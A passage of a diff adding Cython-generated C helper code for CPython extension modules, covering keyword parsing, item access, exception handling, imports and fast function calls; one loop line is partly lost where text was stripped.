* __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) +{ + Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); + for (i = 0; i < n; i++) + { + if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; + } + for (i = 0; i < n; i++) + { + int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); + if (unlikely(eq != 0)) { + if (unlikely(eq < 0)) return NULL; // error + return kwvalues[i]; + } + } + return NULL; // not found (no exception set) +} +#endif + +/* RaiseArgTupleInvalid */ +static void __Pyx_RaiseArgtupleInvalid( + const char* func_name, + int exact, + Py_ssize_t num_min, + Py_ssize_t num_max, + Py_ssize_t num_found) +{ + Py_ssize_t num_expected; + const char *more_or_less; + if (num_found < num_min) { + num_expected = num_min; + more_or_less = "at least"; + } else { + num_expected = num_max; + more_or_less = "at most"; + } + if (exact) { + more_or_less = "exactly"; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", + func_name, more_or_less, num_expected, + (num_expected == 1) ? "" : "s", num_found); +} + +/* RaiseDoubleKeywords */ +static void __Pyx_RaiseDoubleKeywordsError( + const char* func_name, + PyObject* kw_name) +{ + PyErr_Format(PyExc_TypeError, + #if PY_MAJOR_VERSION >= 3 + "%s() got multiple values for keyword argument '%U'", func_name, kw_name); + #else + "%s() got multiple values for keyword argument '%s'", func_name, + PyString_AsString(kw_name)); + #endif +} + +/* ParseKeywords */ +static int __Pyx_ParseOptionalKeywords( + PyObject *kwds, + PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, + PyObject *values[], + Py_ssize_t num_pos_args, + const char* function_name) +{ + PyObject *key = 0, *value = 0; + Py_ssize_t pos = 0; + PyObject*** name; + PyObject*** first_kw_arg = argnames + num_pos_args; + int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); + while (1) { + if (kwds_is_tuple) { + if (pos >= PyTuple_GET_SIZE(kwds)) break; + key = PyTuple_GET_ITEM(kwds, pos); + value = kwvalues[pos]; + pos++; + } + else + { + if (!PyDict_Next(kwds, &pos, &key, &value)) break; + } + name = first_kw_arg; + while (*name && (**name != key)) name++; + if (*name) { + values[name-argnames] = value; + continue; + } + name = first_kw_arg; + #if PY_MAJOR_VERSION < 3 + if (likely(PyString_Check(key))) { + while (*name) { + if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) + && _PyString_Eq(**name, key)) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + if ((**argname == key) || ( + (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) + && _PyString_Eq(**argname, key))) { + goto arg_passed_twice; + } + argname++; + } + } + } else + #endif + if (likely(PyUnicode_Check(key))) { + while (*name) { + int cmp = ( + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**name, key) + ); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + int cmp = (**argname == key) ? 0 : + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**argname, key); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) goto arg_passed_twice; + argname++; + } + } + } else + goto invalid_keyword_type; + if (kwds2) { + if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; + } else { + goto invalid_keyword; + } + } + return 0; +arg_passed_twice: + __Pyx_RaiseDoubleKeywordsError(function_name, key); + goto bad; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + goto bad; +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif +bad: + return -1; +} + +/* GetItemInt */ +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j) { + PyObject *r; + if (unlikely(!j)) return NULL; + r = PyObject_GetItem(o, j); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyList_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyList_GET_SIZE(o)))) { + PyObject *r = PyList_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyTuple_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, int is_list, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyList_GET_SIZE(o); + if ((!boundscheck) || (likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o))))) { + PyObject *r = PyList_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } + else if (PyTuple_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyTuple_GET_SIZE(o); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_subscript) { + PyObject *r, *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return NULL; + r = mm->mp_subscript(o, key); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return NULL; + PyErr_Clear(); + } + } + return sm->sq_item(o, i); + } + } +#else + if (is_list || PySequence_Check(o)) { + return PySequence_GetItem(o, i); + } +#endif + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +} + +/* KeywordStringCheck */ +static int __Pyx_CheckKeywordStrings( + PyObject *kw, + const char* function_name, + int kw_allowed) +{ + PyObject* key = 0; + Py_ssize_t pos = 0; +#if CYTHON_COMPILING_IN_PYPY + if (!kw_allowed && PyDict_Next(kw, &pos, &key, 0)) + goto invalid_keyword; + return 1; +#else + if (CYTHON_METH_FASTCALL && likely(PyTuple_Check(kw))) { + if (unlikely(PyTuple_GET_SIZE(kw) == 0)) + return 1; + if (!kw_allowed) { + key = PyTuple_GET_ITEM(kw, 0); + goto invalid_keyword; + } +#if PY_VERSION_HEX < 0x03090000 + for (pos = 0; pos < PyTuple_GET_SIZE(kw); pos++) { + key = PyTuple_GET_ITEM(kw, pos); + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } +#endif + return 1; + } + while (PyDict_Next(kw, &pos, &key, 0)) { + #if PY_MAJOR_VERSION < 3 + if (unlikely(!PyString_Check(key))) + #endif + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } + if (!kw_allowed && unlikely(key)) + goto invalid_keyword; + return 1; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + return 0; +#endif +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif + return 0; +} + +/* PyErrExceptionMatches */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i= 0x030C00A6 + PyObject *current_exception = tstate->current_exception; + if (unlikely(!current_exception)) return 0; + exc_type = (PyObject*) Py_TYPE(current_exception); + if (exc_type == err) return 1; +#else + exc_type = tstate->curexc_type; + if (exc_type == err) return 1; + if (unlikely(!exc_type)) return 0; +#endif + #if CYTHON_AVOID_BORROWED_REFS + Py_INCREF(exc_type); + #endif + if (unlikely(PyTuple_Check(err))) { + result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); + } else { + result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); + } + #if CYTHON_AVOID_BORROWED_REFS + Py_DECREF(exc_type); + #endif + return result; +} +#endif + +/* PyErrFetchRestore */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject *tmp_value; + assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); + if (value) { + #if CYTHON_COMPILING_IN_CPYTHON + if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) + #endif + PyException_SetTraceback(value, tb); + } + tmp_value = tstate->current_exception; + tstate->current_exception = value; + Py_XDECREF(tmp_value); +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + tmp_type = tstate->curexc_type; + tmp_value = tstate->curexc_value; + tmp_tb = tstate->curexc_traceback; + tstate->curexc_type = type; + tstate->curexc_value = value; + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#endif +} +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject* exc_value; + exc_value = tstate->current_exception; + tstate->current_exception = 0; + *value = exc_value; + *type = NULL; + *tb = NULL; + if (exc_value) { + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + #if CYTHON_COMPILING_IN_CPYTHON + *tb = ((PyBaseExceptionObject*) exc_value)->traceback; + Py_XINCREF(*tb); + #else + *tb = PyException_GetTraceback(exc_value); + #endif + } +#else + *type = tstate->curexc_type; + *value = tstate->curexc_value; + *tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; +#endif +} +#endif + +/* PyObjectGetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro)) + return tp->tp_getattro(obj, attr_name); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_getattr)) + return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); +#endif + return PyObject_GetAttr(obj, attr_name); +} +#endif + +/* GetAttr3 */ +static PyObject *__Pyx_GetAttr3Default(PyObject *d) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (unlikely(!__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + return NULL; + __Pyx_PyErr_Clear(); + Py_INCREF(d); + return d; +} +static CYTHON_INLINE PyObject *__Pyx_GetAttr3(PyObject *o, PyObject *n, PyObject *d) { + PyObject *r; +#if CYTHON_USE_TYPE_SLOTS + if (likely(PyString_Check(n))) { + r = __Pyx_PyObject_GetAttrStrNoError(o, n); + if (unlikely(!r) && likely(!PyErr_Occurred())) { + r = __Pyx_NewRef(d); + } + return r; + } +#endif + r = PyObject_GetAttr(o, n); + return (likely(r)) ? r : __Pyx_GetAttr3Default(d); +} + +/* PyObjectGetAttrStrNoError */ +static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + __Pyx_PyErr_Clear(); +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { + PyObject *result; +#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { + return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); + } +#endif + result = __Pyx_PyObject_GetAttrStr(obj, attr_name); + if (unlikely(!result)) { + __Pyx_PyObject_GetAttrStr_ClearAttributeError(); + } + return result; +} + +/* GetBuiltinName */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name) { + PyObject* result = __Pyx_PyObject_GetAttrStrNoError(__pyx_b, name); + if (unlikely(!result) && !PyErr_Occurred()) { + PyErr_Format(PyExc_NameError, +#if PY_MAJOR_VERSION >= 3 + "name '%U' is not defined", name); +#else + "name '%.200s' is not defined", PyString_AS_STRING(name)); +#endif + } + return result; +} + +/* PyDictVersioning */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { + PyObject **dictptr = NULL; + Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; + if (offset) { +#if CYTHON_COMPILING_IN_CPYTHON + dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); +#else + dictptr = _PyObject_GetDictPtr(obj); +#endif + } + return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; +} +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) + return 0; + return obj_dict_version == __Pyx_get_object_dict_version(obj); +} +#endif + +/* GetModuleGlobalName */ +#if CYTHON_USE_DICT_VERSIONS +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value) +#else +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name) +#endif +{ + PyObject *result; +#if !CYTHON_AVOID_BORROWED_REFS +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 + result = _PyDict_GetItem_KnownHash(__pyx_d, name, ((PyASCIIObject *) name)->hash); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } else if (unlikely(PyErr_Occurred())) { + return NULL; + } +#elif CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(!__pyx_m)) { + return NULL; + } + result = PyObject_GetAttr(__pyx_m, name); + if (likely(result)) { + return result; + } +#else + result = PyDict_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } +#endif +#else + result = PyObject_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } + PyErr_Clear(); +#endif + return __Pyx_GetBuiltinName(name); +} + +/* RaiseUnexpectedTypeError */ +static int +__Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj) +{ + __Pyx_TypeName obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, "Expected %s, got " __Pyx_FMT_TYPENAME, + expected, obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return 0; +} + +/* Import */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level) { + PyObject *module = 0; + PyObject *empty_dict = 0; + PyObject *empty_list = 0; + #if PY_MAJOR_VERSION < 3 + PyObject *py_import; + py_import = __Pyx_PyObject_GetAttrStr(__pyx_b, __pyx_n_s_import); + if (unlikely(!py_import)) + goto bad; + if (!from_list) { + empty_list = PyList_New(0); + if (unlikely(!empty_list)) + goto bad; + from_list = empty_list; + } + #endif + empty_dict = PyDict_New(); + if (unlikely(!empty_dict)) + goto bad; + { + #if PY_MAJOR_VERSION >= 3 + if (level == -1) { + if ((1) && (strchr(__Pyx_MODULE_NAME, '.'))) { + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, 1); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, 1); + #endif + if (unlikely(!module)) { + if (unlikely(!PyErr_ExceptionMatches(PyExc_ImportError))) + goto bad; + PyErr_Clear(); + } + } + level = 0; + } + #endif + if (!module) { + #if PY_MAJOR_VERSION < 3 + PyObject *py_level = PyInt_FromLong(level); + if (unlikely(!py_level)) + goto bad; + module = PyObject_CallFunctionObjArgs(py_import, + name, __pyx_d, empty_dict, from_list, py_level, (PyObject *)NULL); + Py_DECREF(py_level); + #else + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, level); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, level); + #endif + #endif + } + } +bad: + Py_XDECREF(empty_dict); + Py_XDECREF(empty_list); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_import); + #endif + return module; +} + +/* ImportFrom */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name) { + PyObject* value = __Pyx_PyObject_GetAttrStr(module, name); + if (unlikely(!value) && PyErr_ExceptionMatches(PyExc_AttributeError)) { + const char* module_name_str = 0; + PyObject* module_name = 0; + PyObject* module_dot = 0; + PyObject* full_name = 0; + PyErr_Clear(); + module_name_str = PyModule_GetName(module); + if (unlikely(!module_name_str)) { goto modbad; } + module_name = PyUnicode_FromString(module_name_str); + if (unlikely(!module_name)) { goto modbad; } + module_dot = PyUnicode_Concat(module_name, __pyx_kp_u__2); + if (unlikely(!module_dot)) { goto modbad; } + full_name = PyUnicode_Concat(module_dot, name); + if (unlikely(!full_name)) { goto modbad; } + #if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + { + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + goto modbad; + value = PyObject_GetItem(modules, full_name); + } + #else + value = PyImport_GetModule(full_name); + #endif + modbad: + Py_XDECREF(full_name); + Py_XDECREF(module_dot); + Py_XDECREF(module_name); + } + if (unlikely(!value)) { + PyErr_Format(PyExc_ImportError, + #if PY_MAJOR_VERSION < 3 + "cannot import name %.230s", PyString_AS_STRING(name)); + #else + "cannot import name %S", name); + #endif + } + return value; +} + +/* RaiseException */ +#if PY_MAJOR_VERSION < 3 +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + __Pyx_PyThreadState_declare + CYTHON_UNUSED_VAR(cause); + Py_XINCREF(type); + if (!value || value == Py_None) + value = NULL; + else + Py_INCREF(value); + if (!tb || tb == Py_None) + tb = NULL; + else { + Py_INCREF(tb); + if (!PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto raise_error; + } + } + if (PyType_Check(type)) { +#if CYTHON_COMPILING_IN_PYPY + if (!value) { + Py_INCREF(Py_None); + value = Py_None; + } +#endif + PyErr_NormalizeException(&type, &value, &tb); + } else { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto raise_error; + } + value = type; + type = (PyObject*) Py_TYPE(type); + Py_INCREF(type); + if (!PyType_IsSubtype((PyTypeObject *)type, (PyTypeObject *)PyExc_BaseException)) { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto raise_error; + } + } + __Pyx_PyThreadState_assign + __Pyx_ErrRestore(type, value, tb); + return; +raise_error: + Py_XDECREF(value); + Py_XDECREF(type); + Py_XDECREF(tb); + return; +} +#else +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + PyObject* owned_instance = NULL; + if (tb == Py_None) { + tb = 0; + } else if (tb && !PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto bad; + } + if (value == Py_None) + value = 0; + if (PyExceptionInstance_Check(type)) { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto bad; + } + value = type; + type = (PyObject*) Py_TYPE(value); + } else if (PyExceptionClass_Check(type)) { + PyObject *instance_class = NULL; + if (value && PyExceptionInstance_Check(value)) { + instance_class = (PyObject*) Py_TYPE(value); + if (instance_class != type) { + int is_subclass = PyObject_IsSubclass(instance_class, type); + if (!is_subclass) { + instance_class = NULL; + } else if (unlikely(is_subclass == -1)) { + goto bad; + } else { + type = instance_class; + } + } + } + if (!instance_class) { + PyObject *args; + if (!value) + args = PyTuple_New(0); + else if (PyTuple_Check(value)) { + Py_INCREF(value); + args = value; + } else + args = PyTuple_Pack(1, value); + if (!args) + goto bad; + owned_instance = PyObject_Call(type, args, NULL); + Py_DECREF(args); + if (!owned_instance) + goto bad; + value = owned_instance; + if (!PyExceptionInstance_Check(value)) { + PyErr_Format(PyExc_TypeError, + "calling %R should have returned an instance of " + "BaseException, not %R", + type, Py_TYPE(value)); + goto bad; + } + } + } else { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto bad; + } + if (cause) { + PyObject *fixed_cause; + if (cause == Py_None) { + fixed_cause = NULL; + } else if (PyExceptionClass_Check(cause)) { + fixed_cause = PyObject_CallObject(cause, NULL); + if (fixed_cause == NULL) + goto bad; + } else if (PyExceptionInstance_Check(cause)) { + fixed_cause = cause; + Py_INCREF(fixed_cause); + } else { + PyErr_SetString(PyExc_TypeError, + "exception causes must derive from " + "BaseException"); + goto bad; + } + PyException_SetCause(value, fixed_cause); + } + PyErr_SetObject(type, value); + if (tb) { + #if PY_VERSION_HEX >= 0x030C00A6 + PyException_SetTraceback(value, tb); + #elif CYTHON_FAST_THREAD_STATE + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject* tmp_tb = tstate->curexc_traceback; + if (tb != tmp_tb) { + Py_INCREF(tb); + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_tb); + } +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_Fetch(&tmp_type, &tmp_value, &tmp_tb); + Py_INCREF(tb); + PyErr_Restore(tmp_type, tmp_value, tb); + Py_XDECREF(tmp_tb); +#endif + } +bad: + Py_XDECREF(owned_instance); + return; +} +#endif + +/* PyFunctionFastCall */ +#if CYTHON_FAST_PYCALL && !CYTHON_VECTORCALL +static PyObject* __Pyx_PyFunction_FastCallNoKw(PyCodeObject *co, PyObject **args, Py_ssize_t na, + PyObject *globals) { + PyFrameObject *f; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject **fastlocals; + Py_ssize_t i; + PyObject *result; + assert(globals != NULL); + /* XXX Perhaps we should create a specialized + PyFrame_New() that doesn't take locals, but does + take builtins without sanity checking them. + */ + assert(tstate != NULL); + f = PyFrame_New(tstate, co, globals, NULL); + if (f == NULL) { + return NULL; + } + fastlocals = __Pyx_PyFrame_GetLocalsplus(f); + for (i = 0; i < na; i++) { + Py_INCREF(*args); + fastlocals[i] = *args++; + } + result = PyEval_EvalFrameEx(f,0); + ++tstate->recursion_depth; + Py_DECREF(f); + --tstate->recursion_depth; + return result; +} +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs) { + PyCodeObject *co = (PyCodeObject *)PyFunction_GET_CODE(func); + PyObject *globals = PyFunction_GET_GLOBALS(func); + PyObject *argdefs = PyFunction_GET_DEFAULTS(func); + PyObject *closure; +#if PY_MAJOR_VERSION >= 3 + PyObject *kwdefs; +#endif + PyObject *kwtuple, **k; + PyObject **d; + Py_ssize_t nd; + Py_ssize_t nk; + PyObject *result; + assert(kwargs == NULL || PyDict_Check(kwargs)); + nk = kwargs ? PyDict_Size(kwargs) : 0; + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) { + return NULL; + } + if ( +#if PY_MAJOR_VERSION >= 3 + co->co_kwonlyargcount == 0 && +#endif + likely(kwargs == NULL || nk == 0) && + co->co_flags == (CO_OPTIMIZED | CO_NEWLOCALS | CO_NOFREE)) { + if (argdefs == NULL && co->co_argcount == nargs) { + result = __Pyx_PyFunction_FastCallNoKw(co, args, nargs, globals); + goto done; + } + else if (nargs == 0 && argdefs != NULL + && co->co_argcount == Py_SIZE(argdefs)) { + /* function called with no arguments, but all parameters have + a default value: use default values as arguments .*/ + args = &PyTuple_GET_ITEM(argdefs, 0); + result =__Pyx_PyFunction_FastCallNoKw(co, args, Py_SIZE(argdefs), globals); + goto done; + } + } + if (kwargs != NULL) { + Py_ssize_t pos, i; + kwtuple = PyTuple_New(2 * nk); + if (kwtuple == NULL) { + result = NULL; + goto done; + } + k = &PyTuple_GET_ITEM(kwtuple, 0); + pos = i = 0; + while (PyDict_Next(kwargs, &pos, &k[i], &k[i+1])) { + Py_INCREF(k[i]); + Py_INCREF(k[i+1]); + i += 2; + } + nk = i / 2; + } + else { + kwtuple = NULL; + k = NULL; + } + closure = PyFunction_GET_CLOSURE(func); +#if PY_MAJOR_VERSION >= 3 + kwdefs = PyFunction_GET_KW_DEFAULTS(func); +#endif + if (argdefs != NULL) { + d = &PyTuple_GET_ITEM(argdefs, 0); + nd = Py_SIZE(argdefs); + } + else { + d = NULL; + nd = 0; + } +#if PY_MAJOR_VERSION >= 3 + result = PyEval_EvalCodeEx((PyObject*)co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, kwdefs, closure); +#else + result = PyEval_EvalCodeEx(co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, closure); +#endif + Py_XDECREF(kwtuple); +done: + Py_LeaveRecursiveCall(); + return result; +} +#endif + +/* PyObjectCall */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw) { + PyObject *result; + ternaryfunc call = Py_TYPE(func)->tp_call; + if (unlikely(!call)) + return PyObject_Call(func, arg, kw); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = (*call)(func, arg, kw); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectCallMethO */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg) { + PyObject *self, *result; + PyCFunction cfunc; + cfunc = PyCFunction_GET_FUNCTION(func); + self = PyCFunction_GET_SELF(func); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = cfunc(self, arg); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectFastCall */ +static PyObject* __Pyx_PyObject_FastCall_fallback(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs) { + PyObject *argstuple; + PyObject *result; + size_t i; + argstuple = 